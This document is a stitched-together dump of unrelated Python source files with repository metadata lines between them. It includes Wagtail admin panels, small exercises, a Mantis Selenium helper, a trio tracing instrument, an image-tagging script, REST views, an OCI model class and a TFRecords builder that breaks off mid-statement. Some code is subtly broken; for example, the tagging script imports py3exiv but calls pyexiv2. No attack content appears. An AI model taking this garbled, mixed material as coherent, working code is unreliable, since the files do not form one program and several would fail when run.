                FieldPanel('case_study_cta_text'),
                FieldPanel('case_study_cta_link'),
            ],
        ),
        MultiFieldPanel(
            heading="Contact",
            classname='collapsible',
            children=[
                HelpPanel('Required fields for section to show: '
                          'Contact Title, Contact Text'),
                FieldPanel('contact_title'),
                FieldPanel('contact_text'),
            ],
        ),
        SearchEngineOptimisationPanel()
    ]

    settings_panels = [
        FieldPanel('slug'),
    ]

    edit_handler = make_translated_interface(
        content_panels=content_panels,
        settings_panels=settings_panels,
    )
class CapitalInvestContactFormPagePanels:
    """Wagtail edit-handler layout for the Capital Invest contact form page."""
    content_panels = [
        FieldPanel('title'),
        FieldPanel('breadcrumbs_label'),
        FieldPanel('heading'),
        FieldPanel('intro'),
        FieldPanel('comment'),
        FieldPanel('cta_text'),
        SearchEngineOptimisationPanel()
    ]

    settings_panels = [
        FieldPanel('slug'),
    ]

    edit_handler = make_translated_interface(
        content_panels=content_panels,
        settings_panels=settings_panels,
    )
class CapitalInvestContactFormSuccessPagePanels:
    """Wagtail edit-handler layout for the contact form success page."""
    content_panels = [
        FieldPanel('title'),
        FieldPanel('message_box_heading'),
        FieldPanel('message_box_description'),
        FieldPanel('what_happens_next_description')
    ]

    settings_panels = [
        FieldPanel('slug'),
    ]

    edit_handler = make_translated_interface(
        content_panels=content_panels,
        settings_panels=settings_panels,
    )
| 2.015625 | 2 |
_6_EXERCISE_BASIC SYNTAX, CONDITIONAL STATEMENTS AND LOOPS/_7_Maximum_Multiple.py | YordanPetrovDS/Python_Fundamentals | 0 | 17610 | <gh_stars>0
# Read a divisor and an upper bound, then print the largest value in
# [1, bound] that is a multiple of the divisor (nothing is printed when
# no such multiple exists).
divisor = int(input())
bound = int(input())
largest = next((n for n in range(bound, 0, -1) if n % divisor == 0), None)
if largest is not None:
    print(largest)
| 3.5 | 4 |
Task1C.py | benkw26/IA-Flood-Warning-Project | 0 | 17611 | from floodsystem.geo import stations_within_radius
from floodsystem.stationdata import build_station_list
def run():
    """Requirements for Task 1C: print, sorted, the names of all
    monitoring stations within 10 km of Cambridge city centre."""
    all_stations = build_station_list()
    centre = (52.2053, 0.1218)  # Cambridge city centre (lat, lon)
    search_radius = 10          # kilometres
    nearby = stations_within_radius(all_stations, centre, search_radius)
    names = [station.name for station in nearby]
    print(sorted(names))
if __name__ == "__main__":
    # banner printed only when executed as a script
    print("*** Task 1C: CUED Part IA Flood Warning System ***")
    run()
fixture/project.py | Sashatq/bugtrack | 0 | 17612 | from model.objects import Objects
import time
class ProjectHelper:
    """Page-object helper for Mantis project administration.

    Wraps the shared Selenium WebDriver (``app.wd``); the project list is
    cached between reads and the cache is invalidated after a creation.
    """
    def __init__(self, app):
        self.app = app

    # cached result of get_project_list(); None means "not loaded yet"
    project_cache = None

    def get_project_list(self):
        """Return the projects from the Manage Projects page as Objects.

        The page is scraped only when the cache is empty; a copy of the
        cached list is returned so callers cannot mutate the cache.
        """
        if self.project_cache is None:
            wd = self.app.wd
            self.open_manage_project_page()
            self.project_cache = []
            for row in wd.find_elements_by_xpath("//div[@id='content']/div[2]/table/tbody/tr"):
                cells = row.find_elements_by_tag_name("td")
                pname = cells[0].text       # column 1: project name
                description = cells[4].text  # column 5: description
                self.project_cache.append(Objects(pname=pname, description=description))
        return list(self.project_cache)

    def open_manage_project_page(self):
        """Navigate: Manage -> Manage Projects."""
        wd = self.app.wd
        wd.find_element_by_link_text("Manage").click()
        wd.find_element_by_link_text("Manage Projects").click()

    def create(self, objects):
        """Create a new project from *objects* and invalidate the cache."""
        wd = self.app.wd
        self.open_manage_project_page()
        wd.find_element_by_xpath("//input[@value='Create New Project']").click()
        self.fill_form(objects)
        wd.find_element_by_xpath("//input[@value='Add Project']").click()
        # NOTE(review): fixed sleep gives the server time to register the
        # project — an explicit wait would be more robust
        time.sleep(4)
        self.project_cache = None

    def fill_form(self, objects):
        # populate the project form fields from the model object
        self.change_field_value("name", objects.pname)
        self.change_field_value("description", objects.description)

    def change_field_value(self, field_name, text):
        """Replace the value of *field_name* with *text* (no-op when text is None)."""
        wd = self.app.wd
        if text is not None:
            wd.find_element_by_name(field_name).click()
            wd.find_element_by_name(field_name).clear()
            wd.find_element_by_name(field_name).send_keys(text)

    def delete_project(self):
        """Delete the first project in the list, confirming both prompts."""
        wd = self.app.wd
        wd.find_element_by_xpath("//div[@id='sidebar']/ul/li[7]/a/i").click()
        wd.find_element_by_link_text("Manage Projects").click()
        wd.find_element_by_css_selector("td > a").click()
        # Mantis asks for confirmation twice, hence the repeated click
        wd.find_element_by_xpath("//input[@value='Delete Project']").click()
        wd.find_element_by_xpath("//input[@value='Delete Project']").click()
| 2.5625 | 3 |
john_doe/cities/hungary.py | xioren/JohnDoe | 0 | 17613 | <reponame>xioren/JohnDoe
# Hungarian city/town names (ASCII-transliterated, roughly ordered by
# population, largest first) used as sample data for name generation.
cities = [
    'Budapest',
    'Debrecen',
    'Miskolc',
    'Szeged',
    'Pecs',
    'Zuglo',
    'Gyor',
    'Nyiregyhaza',
    'Kecskemet',
    'Szekesfehervar',
    'Szombathely',
    'Jozsefvaros',
    'Paradsasvar',
    'Szolnok',
    'Tatabanya',
    'Kaposvar',
    'Bekescsaba',
    'Erd',
    'Veszprem',
    'Erzsebetvaros',
    'Zalaegerszeg',
    'Kispest',
    'Sopron',
    'Eger',
    'Nagykanizsa',
    'Dunaujvaros',
    'Hodmezovasarhely',
    'Salgotarjan',
    'Cegled',
    'Ozd',
    'Baja',
    'Vac',
    'Szekszard',
    'Papa',
    'Gyongyos',
    'Kazincbarcika',
    'Godollo',
    'Gyula',
    'Hajduboszormeny',
    'Kiskunfelegyhaza',
    'Ajka',
    'Oroshaza',
    'Mosonmagyarovar',
    'Dunakeszi',
    'Kiskunhalas',
    'Esztergom',
    'Jaszbereny',
    'Komlo',
    'Nagykoros',
    'Mako',
    'Budaors',
    'Szigetszentmiklos',
    'Tata',
    'Szentendre',
    'Hajduszoboszlo',
    'Siofok',
    'Torokszentmiklos',
    'Hatvan',
    'Karcag',
    'Gyal',
    'Monor',
    'Keszthely',
    'Varpalota',
    'Bekes',
    'Dombovar',
    'Paks',
    'Oroszlany',
    'Komarom',
    'Vecses',
    'Mezotur',
    'Mateszalka',
    'Mohacs',
    'Csongrad',
    'Kalocsa',
    'Kisvarda',
    'Szarvas',
    'Satoraljaujhely',
    'Hajdunanas',
    'Balmazujvaros',
    'Mezokovesd',
    'Tapolca',
    'Szazhalombatta',
    'Balassagyarmat',
    'Tiszaujvaros',
    'Dunaharaszti',
    'Fot',
    'Dabas',
    'Abony',
    'Berettyoujfalu',
    'Puspokladany',
    'God',
    'Sarvar',
    'Gyomaendrod',
    'Kiskoros',
    'Pomaz',
    'Mor',
    'Sarospatak',
    'Batonyterenye',
    'Bonyhad',
    'Gyomro',
    'Tiszavasvari',
    'Ujfeherto',
    'Nyirbator',
    'Sarbogard',
    'Nagykata',
    'Budakeszi',
    'Pecel',
    'Pilisvorosvar',
    'Sajoszentpeter',
    'Szigethalom',
    'Balatonfured',
    'Hajduhadhaz',
    'Kisujszallas',
    'Dorog',
    'Kormend',
    'Marcali',
    'Barcs',
    'Tolna',
    'Tiszafured',
    'Kiskunmajsa',
    'Tiszafoldvar',
    'Albertirsa',
    'Nagyatad',
    'Tiszakecske',
    'Toeroekbalint',
    'Koszeg',
    'Celldomolk',
    'Heves',
    'Mezobereny',
    'Szigetvar',
    'Pilis',
    'Veresegyhaz',
    'Bicske',
    'Edeleny',
    'Lajosmizse',
    'Kistarcsa',
    'Hajdusamson',
    'Csorna',
    'Nagykallo',
    'Isaszeg',
    'Sarkad',
    'Kapuvar',
    'Ullo',
    'Siklos',
    'Toekoel',
    'Maglod',
    'Paszto',
    'Szerencs',
    'Turkeve',
    'Szeghalom',
    'Kerepes',
    'Jaszapati',
    'Janoshalma',
    'Tamasi',
    'Kunszentmarton',
    'Hajdudorog',
    'Vasarosnameny',
    'Solymar',
    'Rackeve',
    'Derecske',
    'Kecel',
    'Nadudvar',
    'Ocsa',
    'Dunafoldvar',
    'Fehergyarmat',
    'Kiskunlachaza',
    'Kunszentmiklos',
    'Szentgotthard',
    'Devavanya',
    'Biatorbagy',
    'Kunhegyes',
    'Lenti',
    'Ercsi',
    'Balatonalmadi',
    'Polgar',
    'Tura',
    'Suelysap',
    'Fuzesabony',
    'Jaszarokszallas',
    'Gardony',
    'Tarnok',
    'Nyiradony',
    'Zalaszentgrot',
    'Sandorfalva',
    'Soltvadkert',
    'Nyergesujfalu',
    'Bacsalmas',
    'Csomor',
    'Putnok',
    'Veszto',
    'Kistelek',
    'Zirc',
    'Halasztelek',
    'Mindszent',
    'Acs',
    'Enying',
    'Letavertes',
    'Nyirtelek',
    'Szentlorinc',
    'Felsozsolca',
    'Solt',
    'Fegyvernek',
    'Nagyecsed',
    'Encs',
    'Ibrany',
    'Mezokovacshaza',
    'Ujszasz',
    'Bataszek',
    'Balkany',
    'Sumeg',
    'Tapioszecso',
    'Szabadszallas',
    'Battonya',
    'Polgardi',
    'Mezocsat',
    'Totkomlos',
    'Piliscsaba',
    'Szecseny',
    'Fuzesgyarmat',
    'Kaba',
    'Pusztaszabolcs',
    'Teglas',
    'Mezohegyes',
    'Jaszladany',
    'Tapioszele',
    'Aszod',
    'Diosd',
    'Taksony',
    'Tiszalok',
    'Izsak',
    'Komadi',
    'Lorinci',
    'Alsozsolca',
    'Kartal',
    'Dunavarsany',
    'Erdokertes',
    'Janossomorja',
    'Kerekegyhaza',
    'Balatonboglar',
    'Szikszo',
    'Domsod',
    'Nagyhalasz',
    'Kisber',
    'Kunmadaras',
    'Berhida',
    'Kondoros',
    'Melykut',
    'Jaszkiser',
    'Csurgo',
    'Csorvas',
    'Nagyszenas',
    'Ujkigyos',
    'Tapioszentmarton',
    'Tat',
    'Egyek',
    'Tiszaluc',
    'Orbottyan',
    'Rakoczifalva',
    'Hosszupalyi',
    'Paty',
    'Elek',
    'Vamospercs',
    'Morahalom',
    'Bugyi',
    'Emod',
    'Labatlan',
    'Csakvar',
    'Algyo',
    'Kenderes',
    'Csenger',
    'Fonyod',
    'Rakamaz',
    'Martonvasar',
    'Devecser',
    'Orkeny',
    'Tokaj',
    'Tiszaalpar',
    'Kemecse',
    'Korosladany'
]
| 1.617188 | 2 |
carbon0/carbon_quiz/migrations/0010_auto_20200909_0853.py | Carbon0-Games/carbon0-web-app | 2 | 17614 | # Generated by Django 3.1.1 on 2020-09-09 12:53
from django.db import migrations, models
class Migration(migrations.Migration):
    """Reshape Mission: drop description/status, add action and clicks_needed.

    Auto-generated by Django; edits here should normally be limited to
    documentation.
    """

    dependencies = [
        ("carbon_quiz", "0009_auto_20200908_2201"),
    ]

    operations = [
        migrations.RemoveField(
            model_name="mission",
            name="description",
        ),
        migrations.RemoveField(
            model_name="mission",
            name="status",
        ),
        migrations.AddField(
            model_name="mission",
            name="action",
            field=models.CharField(
                help_text="Describes what the user needs to do.",
                max_length=500,
                null=True,
            ),
        ),
        migrations.AddField(
            model_name="mission",
            name="clicks_needed",
            field=models.IntegerField(
                default=1, help_text="Number of the links user needs to click."
            ),
        ),
    ]
| 1.71875 | 2 |
wstack/cli/input.py | CCSGroupInternational/wstack | 0 | 17615 | import json
from ..webstack import run as webstack_run
def process(json_file_list):
    """Load each JSON file in *json_file_list* and run its 'webstack'
    section through webstack_run when it is present and non-empty."""
    for path in json_file_list:
        with open(path) as handle:
            document = json.load(handle)
        webstack_section = document.get('webstack', None)
        if webstack_section:
            webstack_run(webstack_section)
| 2.5625 | 3 |
imgtags.py | Donearm/scripts | 25 | 17616 | <filename>imgtags.py<gh_stars>10-100
#!/usr/bin/env python
# -*- coding: utf-8 -*-
###############################################################################
# Copyright (c) 2011-2019, <NAME>
#
# This program is free software: you can redistribute it and/or modify
# it under the terms of the GNU General Public License as published by
# the Free Software Foundation, either version 3 of the License, or
# (at your option) any later version.
#
###############################################################################
#
# Requirements: Python 3.7 or later, Py3exiv
#
__author__ = "<NAME>"
__license__ = "GPL"
__version__ = "0.2"
__date__ = "20190912"
__email__ = "<EMAIL>"
__status__ = "beta"
import sys
import argparse
import os.path
import py3exiv
def argument_parser():
    """Build the command-line parser and return the parsed arguments."""
    parser = argparse.ArgumentParser()
    parser.add_argument("-f", "--force",
                        dest="force",
                        action="store_true",
                        help="force writing of tags regardless of them being already present")
    parser.add_argument("-i", "--image",
                        dest="image",
                        action="store",
                        required=True,
                        help="the image")
    parser.add_argument("-d", "--delete",
                        dest="delete",
                        action="store_true",
                        help="delete all tags present in an image")
    parser.add_argument(dest="tags",
                        action="store",
                        nargs="*",
                        help="the tags to be written into the file")
    return parser.parse_args()
def write_tags(image, key, tags):
    """Write *tags* (a list of strings) into IPTC *key* of *image* and save.

    NOTE(review): the module imports ``py3exiv`` but this code uses the
    name ``pyexiv2`` — confirm the intended import (e.g. the py3exiv2
    binding exposed as ``pyexiv2``).
    """
    image[key] = pyexiv2.IptcTag(key, tags)
    image.write()
def delete_tags(metadata, key):
    """Delete the tag stored under *key* from *metadata*.

    Returns None on success; prints a notice and returns 1 when the key
    is not present.
    """
    try:
        # idiomatic form of metadata.__delitem__(key)
        del metadata[key]
    except KeyError:
        print(("There's not a %s tag in this image, exiting..." % key))
        return 1
def main():
    """main loop: validate the image path, then view, delete or write tags.

    Behaviour by flags: -d deletes all keywords; no tags given just prints
    the existing ones; tags given are written (prompting unless -f).
    """
    options = argument_parser()
    image = os.path.abspath(options.image)
    # only operate on common raster formats
    if os.path.isfile(image) and image.endswith(('jpg', 'JPG', 'jpeg', 'JPEG', 'png', 'PNG', 'tiff', 'TIFF')):
        # NOTE(review): module imports py3exiv but uses the name pyexiv2 —
        # confirm the intended binding
        m = pyexiv2.ImageMetadata(image)
        m.read()
        iptckeys = m.iptc_keys
        xmpkeys = m.xmp_keys
        exifkeys = m.exif_keys
        if options.delete:
            # delete all tags
            try:
                k = m['Iptc.Application2.Keywords']
                delete_tags(m, 'Iptc.Application2.Keywords')
                print("Deleting tags")
                m.write()
                return 0
            except KeyError:
                # there are already no tags, skip...
                print(("%s has no tags, nothing to delete" % options.image))
                return 0
        if not options.tags:
            # without tags given perhaps the user wants just see the already
            # presents tags (if any)
            try:
                k = m['Iptc.Application2.Keywords']
                print(("%s is already tagged with %s " % (options.image, k.value)))
                return 0
            except:
                print(("%s has no tags set" % options.image))
                return 0
        else:
            try:
                k = m['Iptc.Application2.Keywords']
                if options.force:
                    # Force switch enabled, write tags without questions
                    write_tags(m, 'Iptc.Application2.Keywords', options.tags)
                else:
                    print("There are already these tags present:\n")
                    for t in k.value:
                        print(t)
                    # interactive confirmation before overwriting
                    s = input("\nDo you want to overwrite them with %s ? [y/n] " % options.tags)
                    if s == 'y' or s == 'Y':
                        print("Writing tags")
                        write_tags(m, 'Iptc.Application2.Keywords', options.tags)
                    else:
                        print("Exiting...")
                        sys.exit(0)
            except KeyError:
                # there is no previously set tag with this name, pyexiv2 throws KeyError
                print("Writing tags")
                write_tags(m, 'Iptc.Application2.Keywords', options.tags)
    else:
        print("No image given")
if __name__ == '__main__':
    # propagate main()'s return value as the process exit status
    status = main()
    sys.exit(status)
| 2.34375 | 2 |
notes-to-self/trace.py | guilledk/trio | 4,681 | 17617 | import trio
import os
import json
from itertools import count
# Experiment with generating Chrome Event Trace format, which can be browsed
# through chrome://tracing or other mechanisms.
#
# Screenshot: https://files.gitter.im/python-trio/general/fp6w/image.png
#
# Trace format docs: https://docs.google.com/document/d/1CvAClvFfyA5R-PhYUmn5OOQtYMH4h6I0nSsKchNAySU/preview#
#
# Things learned so far:
# - I don't understand how the ph="s"/ph="f" flow events work – I think
# they're supposed to show up as arrows, and I'm emitting them between tasks
# that wake each other up, but they're not showing up.
# - I think writing out json synchronously from each event is creating gaps in
# the trace; maybe better to batch them up to write up all at once at the
# end
# - including tracebacks would be cool
# - there doesn't seem to be any good way to group together tasks based on
# nurseries. this really limits the value of this particular trace
# format+viewer for us. (also maybe we should have an instrumentation event
# when a nursery is opened/closed?)
# - task._counter should maybe be public
# - I don't know how to best show task lifetime, scheduling times, and what
# the task is actually doing on the same plot. if we want to show particular
# events like "called stream.send_all", then the chrome trace format won't
# let us also show "task is running", because neither kind of event is
# strictly nested inside the other
class Trace(trio.abc.Instrument):
    """Trio Instrument that streams scheduler events as Chrome trace JSON.

    Events are appended incrementally to *out* in the Chrome Event Trace
    ("chrome://tracing") format.  Each Trio task becomes a pseudo-thread
    keyed by the task's internal counter; the I/O manager uses tid -1.
    """
    def __init__(self, out):
        self.out = out
        # the trace is a JSON array; the opening bracket is written eagerly
        # and every event is followed by a trailing comma
        self.out.write("[\n")
        self.ids = count()  # unique ids pairing flow (wakeup) start/finish events
        self._task_metadata(-1, "I/O manager")

    def _write(self, **ev):
        """Serialize one trace event, filling in pid and (except for
        metadata events) a microsecond timestamp."""
        ev.setdefault("pid", os.getpid())
        if ev["ph"] != "M":
            ev.setdefault("ts", trio.current_time() * 1e6)
        self.out.write(json.dumps(ev))
        self.out.write(",\n")

    def _task_metadata(self, tid, name):
        """Emit thread-name and sort-index metadata for pseudo-thread *tid*."""
        self._write(
            name="thread_name",
            ph="M",
            tid=tid,
            args={"name": name},
        )
        self._write(
            name="thread_sort_index",
            ph="M",
            tid=tid,
            args={"sort_index": tid},
        )

    def task_spawned(self, task):
        self._task_metadata(task._counter, task.name)
        self._write(
            name="task lifetime",
            ph="B",
            tid=task._counter,
        )

    def task_exited(self, task):
        self._write(
            name="task lifetime",
            ph="E",
            tid=task._counter,
        )

    def before_task_step(self, task):
        self._write(
            name="running",
            ph="B",
            tid=task._counter,
        )

    def after_task_step(self, task):
        self._write(
            name="running",
            ph="E",
            tid=task._counter,
        )

    def task_scheduled(self, task):
        # emit a flow-event pair from the waking task (if any) to the woken one
        try:
            waker = trio.lowlevel.current_task()
        except RuntimeError:
            pass  # woken from outside any task (e.g. from the run loop itself)
        else:
            id = next(self.ids)
            self._write(
                ph="s",
                cat="wakeup",
                id=id,
                tid=waker._counter,
            )
            self._write(
                cat="wakeup",
                ph="f",
                id=id,
                tid=task._counter,
            )

    def before_io_wait(self, timeout):
        # plain string — the previous f-string had no placeholders
        self._write(
            name="I/O wait",
            ph="B",
            tid=-1,
        )

    def after_io_wait(self, timeout):
        self._write(
            name="I/O wait",
            ph="E",
            tid=-1,
        )
async def child1():
    """Demo task: log start, sleep one second, log exit."""
    print("  child1: started! sleeping now...")
    await trio.sleep(1)
    print("  child1: exiting!")
async def child2():
    """Demo task: log start, sleep one second, log exit."""
    print("  child2: started! sleeping now...")
    await trio.sleep(1)
    print("  child2: exiting!")
async def parent():
    """Spawn child1 and child2 concurrently and wait for both to finish."""
    print("parent: started!")
    async with trio.open_nursery() as nursery:
        print("parent: spawning child1...")
        nursery.start_soon(child1)
        print("parent: spawning child2...")
        nursery.start_soon(child2)
        print("parent: waiting for children to finish...")
        # -- we exit the nursery block here --
    print("parent: all done!")
# Run the demo under the tracing instrument, writing chrome://tracing JSON.
t = Trace(open("/tmp/t.json", "w"))
trio.run(parent, instruments=[t])
| 2.609375 | 3 |
common/data_refinery_common/models/__init__.py | dongbohu/ccdl_test | 0 | 17618 | <reponame>dongbohu/ccdl_test
from data_refinery_common.models.surveys import SurveyJob, SurveyJobKeyValue
from data_refinery_common.models.batches import (
BatchStatuses,
Batch,
BatchKeyValue,
File
)
from data_refinery_common.models.jobs import (
WorkerJob,
DownloaderJob,
ProcessorJob
)
from data_refinery_common.models.organism import Organism
| 1.109375 | 1 |
src/client_sample.py | ryoutoku/gunicorn-soap | 0 | 17619 | from zeep import Client
from models import RequestParameter
class Caller:
    """Demo SOAP client invoking the say_hello service in three styles."""

    def __init__(self):
        wsdl_url = "http://0.0.0.0:8080/?wsdl"
        self._name = "dummy_name"
        self._times = 3
        self._client = Client(wsdl_url)

    def call_say_hello_1(self):
        # Style 1: plain positional arguments.
        response = self._client.service.say_hello_1(self._name, self._times)
        print(response)

    def call_say_hello_2(self):
        # Style 2: a single dict payload.
        payload = {"name": self._name, "times": self._times}
        response = self._client.service.say_hello_2(payload)
        print(response)

    def call_say_hello_3(self):
        # Style 3: a model object serialised via as_dict().
        request = RequestParameter(name=self._name, times=self._times)
        response = self._client.service.say_hello_3(request.as_dict())
        print(response)
        print(type(response))
def main():
    """Exercise each SOAP call style in turn, printing a divider after each."""
    caller = Caller()
    for invoke in (caller.call_say_hello_1,
                   caller.call_say_hello_2,
                   caller.call_say_hello_3):
        invoke()
        print("=====================")


if __name__ == '__main__':
    main()
| 2.890625 | 3 |
rest_api/views.py | vikash98k/django-rest-api | 1 | 17620 | <filename>rest_api/views.py
from rest_framework import generics
from .permissions import IsOwner
from .serializers import BucketlistSerializer, UserSerializer
from .models import Bucketlist
from django.contrib.auth.models import User
from rest_framework.permissions import IsAuthenticated
from rest_framework.authentication import SessionAuthentication
class CreateView(generics.ListCreateAPIView):
    """This class handles the GET and POST requests of our rest api."""
    queryset = Bucketlist.objects.all()
    serializer_class = BucketlistSerializer
    permission_classes = [IsAuthenticated]  # session-authenticated users only
    authentication_classes = [SessionAuthentication]
    def perform_create(self, serializer):
        """Save the post data when creating a new bucketlist, recording the
        requesting user as its owner."""
        serializer.save(owner=self.request.user)
class DetailsView(generics.RetrieveUpdateDestroyAPIView):
    """This class handles GET, PUT, PATCH and DELETE requests for a single
    bucketlist instance."""
    queryset = Bucketlist.objects.all()
    serializer_class = BucketlistSerializer
    permission_classes = [IsAuthenticated]
    authentication_classes = [SessionAuthentication]
class UserView(generics.ListAPIView):
    """Read-only view listing all users."""
    queryset = User.objects.all()
    serializer_class = UserSerializer
    permission_classes = [IsAuthenticated]
    authentication_classes = [SessionAuthentication]
class UserDetailsView(generics.RetrieveAPIView):
    """Read-only view retrieving a single user instance."""
    queryset = User.objects.all()
    serializer_class = UserSerializer
    permission_classes = [IsAuthenticated]
    authentication_classes = [SessionAuthentication]
| 2.234375 | 2 |
darling_ansible/python_venv/lib/python3.7/site-packages/oci/core/models/create_ip_sec_tunnel_bgp_session_details.py | revnav/sandbox | 0 | 17621 | # coding: utf-8
# Copyright (c) 2016, 2020, Oracle and/or its affiliates. All rights reserved.
# This software is dual-licensed to you under the Universal Permissive License (UPL) 1.0 as shown at https://oss.oracle.com/licenses/upl or Apache License 2.0 as shown at http://www.apache.org/licenses/LICENSE-2.0. You may choose either license.
from oci.util import formatted_flat_dict, NONE_SENTINEL, value_allowed_none_or_none_sentinel # noqa: F401
from oci.decorators import init_model_state_from_kwargs
@init_model_state_from_kwargs
class CreateIPSecTunnelBgpSessionDetails(object):
    """
    BGP session configuration for one IPSec tunnel: the inside-tunnel
    interface IPs for both ends plus the customer's BGP ASN.
    """

    def __init__(self, **kwargs):
        """
        Initializes a new CreateIPSecTunnelBgpSessionDetails object with
        values from keyword arguments.  Supported keywords (matching the
        properties of this class): ``oracle_interface_ip``,
        ``customer_interface_ip`` and ``customer_bgp_asn``, all of type str.
        """
        # Attribute name -> declared Swagger type.
        self.swagger_types = {
            'oracle_interface_ip': 'str',
            'customer_interface_ip': 'str',
            'customer_bgp_asn': 'str'
        }
        # Python attribute name -> JSON field name on the wire.
        self.attribute_map = {
            'oracle_interface_ip': 'oracleInterfaceIp',
            'customer_interface_ip': 'customerInterfaceIp',
            'customer_bgp_asn': 'customerBgpAsn'
        }
        self._oracle_interface_ip = None
        self._customer_interface_ip = None
        self._customer_bgp_asn = None

    @property
    def oracle_interface_ip(self):
        """
        The IP address for the Oracle end of the inside tunnel interface,
        e.g. ``10.0.0.4/31`` (must be a /30 or /31).  Required when the
        tunnel's ``routing`` is ``BGP``; optional (troubleshooting or
        monitoring only) when ``routing`` is ``STATIC``.

        :rtype: str
        """
        return self._oracle_interface_ip

    @oracle_interface_ip.setter
    def oracle_interface_ip(self, oracle_interface_ip):
        self._oracle_interface_ip = oracle_interface_ip

    @property
    def customer_interface_ip(self):
        """
        The IP address for the CPE end of the inside tunnel interface,
        e.g. ``10.0.0.5/31`` (must be a /30 or /31).  Required when the
        tunnel's ``routing`` is ``BGP``; optional (troubleshooting or
        monitoring only) when ``routing`` is ``STATIC``.

        :rtype: str
        """
        return self._customer_interface_ip

    @customer_interface_ip.setter
    def customer_interface_ip(self, customer_interface_ip):
        self._customer_interface_ip = customer_interface_ip

    @property
    def customer_bgp_asn(self):
        """
        The ASN of the network on the CPE end of the BGP session, in
        "asplain" format; 2-byte (e.g. ``12345``) or 4-byte
        (e.g. ``1587232876``).  Required when ``routing`` is ``BGP``; must
        be None when ``routing`` is ``STATIC``.

        :rtype: str
        """
        return self._customer_bgp_asn

    @customer_bgp_asn.setter
    def customer_bgp_asn(self, customer_bgp_asn):
        self._customer_bgp_asn = customer_bgp_asn

    def __repr__(self):
        return formatted_flat_dict(self)

    def __eq__(self, other):
        return other is not None and self.__dict__ == other.__dict__

    def __ne__(self, other):
        return not self == other
| 2.015625 | 2 |
server_django/prikmeter/views.py | ttencate/smartmetertap | 1 | 17622 | <filename>server_django/prikmeter/views.py<gh_stars>1-10
from django.contrib import auth, messages
from django.shortcuts import redirect, render
from django.views.decorators.http import require_POST, require_safe
@require_safe
def index(request):
    """Render the landing page (safe methods GET/HEAD only)."""
    context = {}
    return render(request, 'prikmeter/index.html', context)
@require_POST
def login(request):
    """Authenticate the posted credentials and start a session.

    On bad credentials a flash message is queued instead of an error page;
    either way the user is redirected to ``next`` (or the index).
    """
    user = auth.authenticate(
        request,
        email=request.POST['email'],
        password=request.POST['password'],
    )
    if user is None:
        messages.error(request, 'Invalid username or password.')
    else:
        auth.login(request, user)
    return redirect(request.POST['next'] or 'prikmeter:index')
@require_POST
def logout(request):
    """End the current session and redirect to ``next`` (or the index).

    Bug fix: ``django.contrib.auth.logout`` requires the request object;
    the previous ``auth.logout()`` call raised TypeError at runtime.
    """
    auth.logout(request)
    return redirect(request.POST['next'] or 'prikmeter:index')
| 2.109375 | 2 |
scenarios/order_show/executable.py | trenton42/txbalanced | 0 | 17623 | import balanced
# NOTE(review): the API key below is truncated/redacted ("<KEY>") -- substitute
# a real test-marketplace key before running.
balanced.configure('ak-test-1o9QKwUCrwstHW<KEY>')
# Fetch a single order resource by its URI.
order = balanced.Order.fetch('/orders/OR7qAh5x1cFzX0U9hD628LPa')
python/array/leetcode/move_zero.py | googege/algo-learn | 153 | 17624 | <reponame>googege/algo-learn<filename>python/array/leetcode/move_zero.py
from typing import List
# Move zeroes (LeetCode 283): push every zero to the end of the list while
# preserving the relative order of the non-zero elements, in place.
class Solution:
    # Variant 1: build the answer in a scratch list, then copy it back.
    def moveZeroes1(self, nums: List[int]) -> None:
        scratch = [0] * len(nums)
        write = 0
        for value in nums:
            if value != 0:
                scratch[write] = value
                write += 1
        nums[:] = scratch[:]

    # Variant 2: two pointers, swapping each non-zero forward in place.
    def moveZeroes2(self, nums: List[int]) -> None:
        write = 0
        for read, value in enumerate(nums):
            if value != 0:
                nums[read], nums[write] = nums[write], nums[read]
                write += 1
| 3.59375 | 4 |
make_tfrecords.py | ssarfjoo/improvedsegan | 36 | 17625 | from __future__ import print_function
import tensorflow as tf
import numpy as np
from collections import namedtuple, OrderedDict
from subprocess import call
import scipy.io.wavfile as wavfile
import argparse
import codecs
import timeit
import struct
import toml
import re
import sys
import os
def _int64_feature(value):
    """Wrap a single int in a tf.train.Feature (int64 list of length 1)."""
    return tf.train.Feature(int64_list=tf.train.Int64List(value=[value]))
def _bytes_feature(value):
    """Wrap a raw byte string in a tf.train.Feature (bytes list of length 1)."""
    return tf.train.Feature(bytes_list=tf.train.BytesList(value=[value]))
def slice_signal(signal, window_size, stride=0.5):
    """Cut a 1-D signal into consecutive windows of ``window_size`` samples.

    Consecutive windows start ``int(window_size * stride)`` samples apart,
    so the default stride=0.5 yields 50%-overlapping windows.  Any trailing
    remainder shorter than ``window_size`` is dropped.
    """
    assert signal.ndim == 1, signal.ndim
    hop = int(window_size * stride)
    windows = [
        signal[start:start + window_size]
        for start in range(0, signal.shape[0] - window_size + 1, hop)
    ]
    return np.array(windows, dtype=np.int32)
def read_and_slice(filename, wav_canvas_size, stride=0.5):
    """Load a 16 kHz wav file and return its overlapping windowed slices."""
    sample_rate, samples = wavfile.read(filename)
    if sample_rate != 16000:
        raise ValueError('Sampling rate is expected to be 16kHz!')
    return slice_signal(samples, wav_canvas_size, stride)
def encoder_proc(wav_filename, noisy_path, out_file, wav_canvas_size, baseline_dir=None):
    """ Read and slice the wav and noisy files and write to TFRecords.
    out_file: TFRecordWriter.
    Each aligned slice pair/triple (clean, noisy[, baseline]) becomes one
    tf.train.Example holding the raw int32 bytes of the window.  The noisy
    (and optional baseline) file must share the clean file's basename.
    """
    ppath, wav_fullname = os.path.split(wav_filename)
    noisy_filename = os.path.join(noisy_path, wav_fullname)
    wav_signals = read_and_slice(wav_filename, wav_canvas_size)
    noisy_signals = read_and_slice(noisy_filename, wav_canvas_size)
    if not baseline_dir is None:
        baseline_filename = os.path.join(baseline_dir, wav_fullname)
        baseline_signals = read_and_slice(baseline_filename, wav_canvas_size)
    # NOTE(review): only clean/noisy shapes are checked; baseline is assumed
    # to align as well -- confirm the upstream data guarantees this.
    assert wav_signals.shape == noisy_signals.shape, noisy_signals.shape
    if baseline_dir is None:
        for (wav, noisy) in zip(wav_signals, noisy_signals):
            wav_raw = wav.tostring()
            noisy_raw = noisy.tostring()
            example = tf.train.Example(features=tf.train.Features(feature={
                'wav_raw': _bytes_feature(wav_raw),
                'noisy_raw': _bytes_feature(noisy_raw)}))
            out_file.write(example.SerializeToString())
    else:
        for (wav, noisy, base) in zip(wav_signals, noisy_signals, baseline_signals):
            wav_raw = wav.tostring()
            noisy_raw = noisy.tostring()
            baseline_raw = base.tostring()
            example = tf.train.Example(features=tf.train.Features(feature={
